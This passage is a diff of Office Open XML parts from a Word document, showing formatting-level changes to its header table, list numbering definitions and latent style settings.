+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:tbl>
     <w:tblPr>
-      <w:tblStyle w:val="TableNormal"/>
-      <w:bidiVisual w:val="0"/>
       <w:tblW w:w="0" w:type="auto"/>
       <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
     </w:tblPr>
@@ -1145,26 +847,21 @@
       <w:tc>
         <w:tcPr>
           <w:tcW w:w="3120" w:type="dxa"/>
-          <w:tcMar/>
         </w:tcPr>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="Header"/>
-            <w:bidi w:val="0"/>
             <w:ind w:left="-115"/>
-            <w:jc w:val="left"/>
           </w:pPr>
         </w:p>
       </w:tc>
       <w:tc>
         <w:tcPr>
           <w:tcW w:w="3120" w:type="dxa"/>
-          <w:tcMar/>
         </w:tcPr>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="Header"/>
-            <w:bidi w:val="0"/>
             <w:jc w:val="center"/>
           </w:pPr>
         </w:p>
@@ -1172,12 +869,10 @@
       <w:tc>
         <w:tcPr>
           <w:tcW w:w="3120" w:type="dxa"/>
-          <w:tcMar/>
         </w:tcPr>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="Header"/>
-            <w:bidi w:val="0"/>
             <w:ind w:right="-115"/>
             <w:jc w:val="right"/>
           </w:pPr>
@@ -1188,18 +883,18 @@
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Header"/>
-      <w:bidi w:val="0"/>
     </w:pPr>
   </w:p>
 </w:hdr>
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="3">
-    <w:nsid w:val="757a9a20"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="167B7B7B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="16F28AC0"/>
+    <w:lvl w:ilvl="0" w:tplc="545A5952">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%1."/>
@@ -1208,7 +903,7 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
+    <w:lvl w:ilvl="1" w:tplc="1B4EE3E2">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%2."/>
@@ -1217,7 +912,7 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
+    <w:lvl w:ilvl="2" w:tplc="01E62962">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%3."/>
@@ -1226,7 +921,7 @@
         <w:ind w:left="2160" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
+    <w:lvl w:ilvl="3" w:tplc="1772D078">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%4."/>
@@ -1235,7 +930,7 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
+    <w:lvl w:ilvl="4" w:tplc="05BEAA4C">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%5."/>
@@ -1244,7 +939,7 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
+    <w:lvl w:ilvl="5" w:tplc="900CBCEC">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%6."/>
@@ -1253,7 +948,7 @@
         <w:ind w:left="4320" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
+    <w:lvl w:ilvl="6" w:tplc="2236B97A">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%7."/>
@@ -1262,7 +957,7 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
+    <w:lvl w:ilvl="7" w:tplc="029A3578">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%8."/>
@@ -1271,7 +966,7 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
+    <w:lvl w:ilvl="8" w:tplc="CBF2BC18">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%9."/>
@@ -1281,10 +976,11 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="2">
-    <w:nsid w:val="167b7b7b"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4923DB14"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="58F04830"/>
+    <w:lvl w:ilvl="0" w:tplc="D4CE8E94">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%1."/>
@@ -1293,7 +989,7 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
+    <w:lvl w:ilvl="1" w:tplc="6690424C">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%2."/>
@@ -1302,7 +998,7 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
+    <w:lvl w:ilvl="2" w:tplc="AD426FA0">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%3."/>
@@ -1311,7 +1007,7 @@
         <w:ind w:left="2160" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
+    <w:lvl w:ilvl="3" w:tplc="F1084880">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%4."/>
@@ -1320,7 +1016,7 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
+    <w:lvl w:ilvl="4" w:tplc="EDDEEB3E">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%5."/>
@@ -1329,7 +1025,7 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
+    <w:lvl w:ilvl="5" w:tplc="2C9019BC">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%6."/>
@@ -1338,7 +1034,7 @@
         <w:ind w:left="4320" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
+    <w:lvl w:ilvl="6" w:tplc="A8425D6E">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%7."/>
@@ -1347,7 +1043,7 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
+    <w:lvl w:ilvl="7" w:tplc="A3905324">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%8."/>
@@ -1356,7 +1052,7 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
+    <w:lvl w:ilvl="8" w:tplc="EF680EC4">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%9."/>
@@ -1366,10 +1062,11 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="1">
-    <w:nsid w:val="4923db14"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="757A9A20"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B212E0C6"/>
+    <w:lvl w:ilvl="0" w:tplc="98A2ED60">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%1."/>
@@ -1378,7 +1075,7 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
+    <w:lvl w:ilvl="1" w:tplc="03563B6C">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%2."/>
@@ -1387,7 +1084,7 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
+    <w:lvl w:ilvl="2" w:tplc="1F0EB64A">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%3."/>
@@ -1396,7 +1093,7 @@
         <w:ind w:left="2160" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
+    <w:lvl w:ilvl="3" w:tplc="BF1646A4">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%4."/>
@@ -1405,7 +1102,7 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
+    <w:lvl w:ilvl="4" w:tplc="64161FD8">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%5."/>
@@ -1414,7 +1111,7 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
+    <w:lvl w:ilvl="5" w:tplc="0928C48C">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%6."/>
@@ -1423,7 +1120,7 @@
         <w:ind w:left="4320" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
+    <w:lvl w:ilvl="6" w:tplc="B4628D5E">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%7."/>
@@ -1432,7 +1129,7 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
+    <w:lvl w:ilvl="7" w:tplc="EE84FC2C">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%8."/>
@@ -1441,7 +1138,7 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
+    <w:lvl w:ilvl="8" w:tplc="A606B80C">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%9."/>
@@ -1451,24 +1148,24 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="1" w16cid:durableId="64576364">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="1">
+  <w:num w:numId="2" w16cid:durableId="548495595">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="2077703631">
     <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" mc:Ignorable="w14 w15 wp14 w16se w16cid w16 w16cex w16sdtdh w16sdtfl">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
-        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
+        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
         <w:sz w:val="24"/>
         <w:szCs w:val="24"/>
         <w:lang w:val="en-US" w:eastAsia="ja-JP" w:bidi="ar-SA"/>
@@ -1480,17 +1177,17 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -1500,22 +1197,22 @@
     <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -1546,7 +1243,7 @@
     <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
     <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -1746,8 +1443,8 @@
     <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
     <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
     <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
     <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
     <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
